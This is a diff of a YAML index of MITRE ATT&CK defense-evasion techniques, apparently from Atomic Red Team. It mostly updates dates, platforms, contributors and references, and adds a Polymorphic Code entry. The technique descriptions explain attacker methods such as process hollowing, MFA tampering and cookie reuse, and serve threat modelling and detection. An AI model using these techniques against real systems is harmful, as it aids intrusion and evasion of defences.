       - Prasad Somasamudram, McAfee
@@ -11171,7 +11258,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -11180,19 +11267,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -11240,11 +11325,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -11312,18 +11398,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -11370,7 +11455,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -11392,7 +11477,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -11467,6 +11551,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -11526,7 +11611,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests:
     - name: Decode base64 Data into Script
@@ -11564,7 +11648,7 @@ defense-evasion:
         name: sh
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -11593,24 +11677,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -11645,9 +11731,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -11670,7 +11753,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -11688,8 +11771,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -11728,7 +11809,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -11771,10 +11852,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -11818,7 +11967,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -11843,8 +11992,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -11875,7 +12022,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -11894,7 +12041,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1553:
     technique:
@@ -11989,11 +12135,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -12073,11 +12218,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:24:56.148Z'
       name: 'Signed Binary Proxy Execution: Regsvr32'
       description: |-
         Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -12142,12 +12286,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.010
     atomic_tests: []
   T1036.003:
     technique:
-      modified: '2023-09-14T21:12:48.411Z'
+      modified: '2024-09-12T19:30:45.065Z'
       name: 'Masquerading: Rename System Utilities'
       description: 'Adversaries may rename legitimate system utilities to try to evade
         security mechanisms concerning the usage of those utilities. Security monitoring
@@ -12196,8 +12339,8 @@ defense-evasion:
         external_id: T1036.003
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -12212,14 +12355,13 @@ defense-evasion:
         url: https://lolbas-project.github.io/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.003
     atomic_tests: []
   T1562.011:
     technique:
-      modified: '2023-04-12T22:46:33.995Z'
+      modified: '2024-10-16T20:12:44.962Z'
       name: Spoof Security Alerting
       description: |-
         Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -12231,7 +12373,7 @@ defense-evasion:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -12261,13 +12403,12 @@ defense-evasion:
         url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -12328,7 +12469,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1027.003:
@@ -12384,11 +12524,10 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -12412,11 +12551,10 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -12441,9 +12579,8 @@ defense-evasion:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -12523,7 +12660,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.009:
     technique:
@@ -12557,7 +12693,7 @@ defense-evasion:
       - source_name: LOLBAS Regasm
         url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
         description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:55:48.725Z'
       name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
       description: |-
         Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -12584,8 +12720,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.009
     atomic_tests: []
   T1553.004:
@@ -12680,7 +12814,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.004
     atomic_tests:
     - name: Install root CA on macOS
@@ -12719,43 +12852,20 @@ defense-evasion:
         elevation_required: true
   T1027.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
-      type: attack-pattern
-      created: '2020-03-16T15:30:57.711Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1027.004
-        url: https://attack.mitre.org/techniques/T1027/004
-      - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
-          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
-          campaign. Retrieved November 29, 2018.'
-        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
-        source_name: ClearSky MuddyWater Nov 2018
-      - source_name: TrendMicro WindowsAppMac
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
-        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
-          Info Stealer and Adware. Retrieved April 25, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-03T17:43:14.766Z'
       name: 'Obfuscated Files or Information: Compile After Delivery'
       description: |-
-        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+        Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
 
         Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor the execution file paths and command-line arguments
         for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
         suspicious behavior to reduce false positives from normal user and administrator
@@ -12764,9 +12874,14 @@ defense-evasion:
         and execution frameworks like Mono and determine if they have a legitimate
         purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
         should only be used in specific and limited cases, like for software development.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Creation'
@@ -12778,12 +12893,35 @@ defense-evasion:
       - Anti-virus
       - Binary Analysis
       - Static File Analysis
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Compiler software (either native to the system or delivered by the adversary)
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+      created: '2020-03-16T15:30:57.711Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/004
+        external_id: T1027.004
+      - source_name: ClearSky MuddyWater Nov 2018
+        description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+          in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+          campaign. Retrieved November 29, 2018.'
+        url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+      - source_name: ATTACK IQ
+        description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+          (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+          Binaries. Retrieved July 15, 2024.'
+        url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+      - source_name: TrendMicro WindowsAppMac
+        description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+          Info Stealer and Adware. Retrieved April 25, 2019.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1027.004
     atomic_tests:
     - name: C compile
@@ -12923,7 +13061,7 @@ defense-evasion:
         url: https://github.com/decalage2/oletools
         description: decalage2. (2019, December 3). python-oletools. Retrieved September
           18, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-15T14:02:07.944Z'
       name: VBA Stomping
       description: |-
         Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -12949,12 +13087,10 @@ defense-evasion:
       x_mitre_system_requirements:
       - MS Office version specified in <code>_VBA_PROJECT</code> stream must match
         host
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -13044,7 +13180,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1127.001:
@@ -13102,12 +13237,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127.001
     atomic_tests: []
   T1656:
     technique:
-      modified: '2023-09-30T19:45:05.886Z'
+      modified: '2024-10-15T15:59:06.382Z'
       name: Impersonation
       description: "Adversaries may impersonate a trusted person or organization in
         order to persuade and trick a target into performing some action on their
@@ -13149,10 +13283,9 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
